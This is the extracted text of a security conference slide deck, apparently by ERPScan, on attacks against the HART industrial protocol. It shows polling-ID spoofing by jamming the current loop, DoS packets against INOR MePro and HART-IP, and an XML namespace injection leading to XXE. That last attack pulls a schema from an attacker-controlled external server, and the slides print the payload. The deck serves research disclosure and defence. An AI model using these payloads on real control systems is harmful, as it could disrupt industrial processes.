  • 16. Spoof  is  impossible  in  HART  FSK?   •  The  following  a]acks  are  possible  only  if  a]acker  can  force   HART  master  to  connect  to  his  forged  HART  device  instead  of   real  device.     •  But  HART  protocol  FSK  physical  layer  based  on  FSK,  half-­‐duplex   and  master-­‐slave  scheme,  so  we  can’t  simply  spoof  HART   packet,  because  if  we  both  answer  on  master  packet,  collision   will  occur.   •  HART  is  secured  against  such  a)acks  according  to  vendors.   So,  spoofing  a)acks  impossible  in  HART?     That’s  false.  We  can’t  simply  spoof,  but  we  can     change  RTU  polling  ID.   erpscan.com   16  ERPScan  —  invest  in  security  to  secure  investments  
  • 17. A)ack  scheme       erpscan.com   17  ERPScan  —  invest  in  security  to  secure  investments   Current  loop   Master   Slave   (1)  Normal  process:  master  speaks  with  slave   Command  with  address  -­‐>   E0BD010303   <-­‐  Reply   PollID:  1   UniqueID:  E0BD010303     Sniffing  traffic   A]acker  
  • 18. A)ack  scheme       erpscan.com   18  ERPScan  —  invest  in  security  to  secure  investments   Current  loop   Master   Slave   (2)  A]acker  JAMs  the  line   PollID:  1   UniqueID:  E0BD010303     A]acker  
  • 19. A)ack  scheme       erpscan.com   19  ERPScan  —  invest  in  security  to  secure  investments   Current  loop   Master   Slave   (3)  Immediately  a;er  that  sends  command  6  to  RTU     Change  your  polling  id  to  9  -­‐>  <-­‐  Reply   PollID:  9   UniqueID:  E0BD010303     A]acker  
  • 20. A)ack  scheme       erpscan.com   20  ERPScan  —  invest  in  security  to  secure  investments   Current  loop   Master   Slave   (4)  Master  asks:  who  has  polling  ID  equal  to  1?   Command  0  for     polling  id  1  -­‐>   <-­‐  Reply   PollID:  9   UniqueID:  E0BD010303     PollID:  1   UniqueID:  E0BD010304     A]acker  
  • 21. A)ack  scheme       erpscan.com   21  ERPScan  —  invest  in  security  to  secure  investments   Current  loop   Master   Slave   (5)  Now  master  speaks  to  a]acker,  not  to  RTU   Command  with  address   E0BD010304  -­‐>   <-­‐  Reply   PollID:  9   UniqueID:  E0BD010303     PollID:  1   UniqueID:  E0BD010304     A]acker  
  • 22. Example:  INOR  MePro   •  An  example:  INOR  MePro  2.12.01   •  HART   transmi]ers   setup,   calibraHon,   and   diagnosHcs   so;ware   •  Denial  of  Service  vulnerability:       HART  command  0  replies  with  0  in  length  and  >250  ‘A’   (smashing  maximum  packet  length)     erpscan.com   22  ERPScan  —  invest  in  security  to  secure  investments  
  • 23. INOR  MePro  2.12.01  DoS       erpscan.com   23  ERPScan  —  invest  in  security  to  secure  investments  
  • 24. A)acks  on  the  upper  levels:  PAS   •  Plant  Assets  management  So;ware  provides  tools  for  managing   plants  assets,  integrates  with  MES  &&  ERP   •  There  are  PAS  soluHons  for  managing  RTUs  and  PLCs   •  Most  popular  soluHons:  FieldCare  and  PACTWare   •  Most  of  the  soluHons  are  based  on  FDT/DTM  standard   •  FDT  standardizes  the  communicaHon  and  configuraHon   interface  between  all  field  devices  and  host  systems   •  DTM  provides  a  unified  structure  for  accessing  device   parameters,  configuring  and  operaHng  the  devices,  and   diagnosing  problems   •  DTMs  can  be  also  used  for  OPC  &&  SCADA   erpscan.com   24  ERPScan  —  invest  in  security  to  secure  investments  
  • 25. erpscan.com   25       Current  Loop   Transmi]ers  &&  I/O  HART   modem   CommDTM   DeviceDTM   Frame  ApplicaHon   COM  Container   COM  Components   ERPScan  —  invest  in  security  to  secure  investments   What  is  FDT/DTM?  
  • 26. Example  frame  applica:on:  FieldCare   erpscan.com   26  ERPScan  —  invest  in  security  to  secure  investments  
  • 27. FDT/DTM  architecture   erpscan.com   27   *diagram  from  the  official  FDT/DTM  specificaHon   ERPScan  —  invest  in  security  to  secure  investments  
  • 28. XML:  worth  a  try   What  will  happen  if  the  a]acker  inserts  some  bad  XML   symbols  in  the  device  tag?   erpscan.com   28  ERPScan  —  invest  in  security  to  secure  investments  
  • 29. Is  it  usable?   •  Unfortunately,  HART  device  tag  cannot  exceed  8  bytes   (6  packed  ASCII)  and  should  only  be  in  upper-­‐case   •  Fortunately,  HART  long  device  tag  can  be  up  to  32   ASCII  characters   •  Thus,  a  DTM  component  that  using  it  for  device   idenHficaHon  may  be  vulnerable   And  we  found  such  a  component  made  by  a  VERY  BIG   vendor!   erpscan.com   29  ERPScan  —  invest  in  security  to  secure  investments  
  • 30. XML  NS  injec:on   •  We  have  only  32  bytes  for  XML  injecHon  and  cannot   access  the  beginning  of  document   •  So  XML  NS  injecHon  was  used  to  include  external  XDR   schema:   " xmlns="x-schema:http://pc erpscan.com   30  ERPScan  —  invest  in  security  to  secure  investments  
  • 31. Injec:ng  link  into  external  XDR  schema     erpscan.com   31  ERPScan  —  invest  in  security  to  secure  investments  
  • 32. XDR  schema  injec:on  →  XXE   •  It  works.  Now  we  can  start  the  web  server  that  returns  the   specially  cra;ed  XML  schema,  which  will  provide  an  XXE:     C:Tools>type index.html <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE Ent [ <!ELEMENT Ent ANY> <!ENTITY xxe SYSTEM "http://127.0.0.1:81/"> ]> <Ent>&xxe;</Ent> C:Tools>python simplehttp.py Serving HTTP on 0.0.0.0 port 80 ... erpscan.com   32  ERPScan  —  invest  in  security  to  secure  investments  
  • 33. Working  XML  eXternal  En:ty     erpscan.com   33  ERPScan  —  invest  in  security  to  secure  investments  
  • 34. A)ack  scheme       erpscan.com   34   Current  loop   PAS   PAS  Web  (e.g.  condiHon  monitoring)/MES   XML  data   Long  tag  change  packet   "  xmlns=“x-­‐schema:h]p://q123.ru     A]acker   HART  transmi]er   XMLI   Evil  web   server   Request  for  remote  XDR  schema   Reply  with  XXE   XXE   1   2   3   4   5   Internet ERPScan  —  invest  in  security  to  secure  investments  
  • 35. Note!   •  FieldCare  has  decent  architecture,  but  it  isn't  vulnerable  in  this   way:  the  vulnerability  persists  only  in  the  component   erpscan.com   35   Another  component     reac:on  to  external  en:ty   But  you  have  thousands  of  DMTs  to  check    this  a)ack  against  them!   ERPScan  —  invest  in  security  to  secure  investments  
  • 36. Possible  risks  &&  consequences   XXE  allows  a]ackers  to  do  evil  things,  such  as:   •  Reading  files   •  NTLM  relay  a]acks   •  SSRF  (server  side  request  forgery)  a]acks   •  XML  parser  DoS  (memory  consumpHon,  etc.)   Moreover,  as  you  can  see  on  slides,  the  vulnerable   component  uses  Internet  Explorer  to  resolve  external   XML  inclusions,  and  it  can  also  be  used  by  the  a]acker  if   the  IE  version  is  old  and  unpatched  (possible  RCE  and   other  things)   erpscan.com   36  ERPScan  —  invest  in  security  to  secure  investments  
  • 37. HART  over  IP   •  HART  can  work  over  TCP  or  over  UDP  (port  5094  or   20004/20003)   •  No  authen:ca:on  required  at  all!   •  First,  client  (e.g.  OPC)  and  server  (e.g.  transmi]er)  establish   communicaHon,  then  HART  commands  and  answers  can  be   directly  sent  in  packets  with  a  HART-­‐IP  header   erpscan.com   37  ERPScan  —  invest  in  security  to  secure  investments  
  • 38. HART  OPC  Server       erpscan.com   38  ERPScan  —  invest  in  security  to  secure  investments  
  • 39. Another  DoS    Cra;  a  packet  with  a  bad  HART-­‐IP  header:     hartip = 'x41x01x00x00x00x02' + 'x0000'   erpscan.com   39  ERPScan  —  invest  in  security  to  secure  investments  
  • 40. Tools  developed   •  HRTShield  –  a  high-­‐power  low-­‐noise  HART  modem   Arduino  shield  for  sniffing,  injecHng,  and  jamming   current  loop   •  Python  HART  protocol  library  and  some  scripts  for   HRTShield  (JAM,  change  long  tag,  and  others…)   •  Metasploit  auxiliary  modules  for  scanning  HART-­‐IP   ports  in  networks  and  run  basic  HART  commands,  such   as  device  idenHficaHon,  reading  and  changing   parameters,  working  with  tags   erpscan.com   40  ERPScan  —  invest  in  security  to  secure  investments  
  • 41. HRTShield   erpscan.com   41  ERPScan  —  invest  in  security  to  secure  investments  
  • 42. Conclusion   •   HART  isn’t  as  secure  as  they  have  been  telling  you.   Sniffing  and  injecHng  in  current  loop  is  possible   •   Every  skilled  electric  engineer/hardware  hacker  can   create  HART  devices  easily   •   Thus,  physical  security  is  the  ToDo  item  No.1  when  you   are  planning  HART  infrastructure   •   HART-­‐IP  protocol  needs  deep  redesign  to  make  it  more   secure  and  reliable   erpscan.com   42  ERPScan  —  invest  in  security  to  secure  investments  
  • 43. Links   •   HART  Shield  Circuit  and  PCB  (Eagle):   h]ps://github.com/Darkkey/hrtshield   •   Python  scripts  and  sketches  for  *duino:     h]ps://github.com/Darkkey/harHnsecurity   •   Metasploit  modules:   h]ps://github.com/Darkkey/hartmeta   erpscan.com   43  ERPScan  —  invest  in  security  to  secure  investments  
  • 44. Thanksgiving  service   •   Alexander  Malinovskiy  (Weedle)  for  great  help  with  HART   physical  layer  research  and  making  HRTShield   •   Alexander  Polyakov  (sh2kerr)  for  making  this  research  possible   •   Fedor  Savelyev  and  Grigoriy  Savelyev  for  consultaHons  on   graduaHng  amplifiers   •   Svetlana  Cherkasova  for  some  binary  magic   •   KonstanHn  Karpov  (QweR)  for  helping  with  delivering  HART   devices   •   Maxim  Integrated  for  great  ICs  and  support   •   The  electronics.stackexchange.com  guys  for  answering  many   stupid  quesHons     erpscan.com   44  ERPScan  —  invest  in  security  to  secure  investments  
  • 45. Web:    www.erpscan.com   e-­‐mail:     info@erpscan.com   abolshev@erpscan.com                                     Twi]er:     @erpscan   @dark_k3y   Thank  you  for  listening!   Any  Q?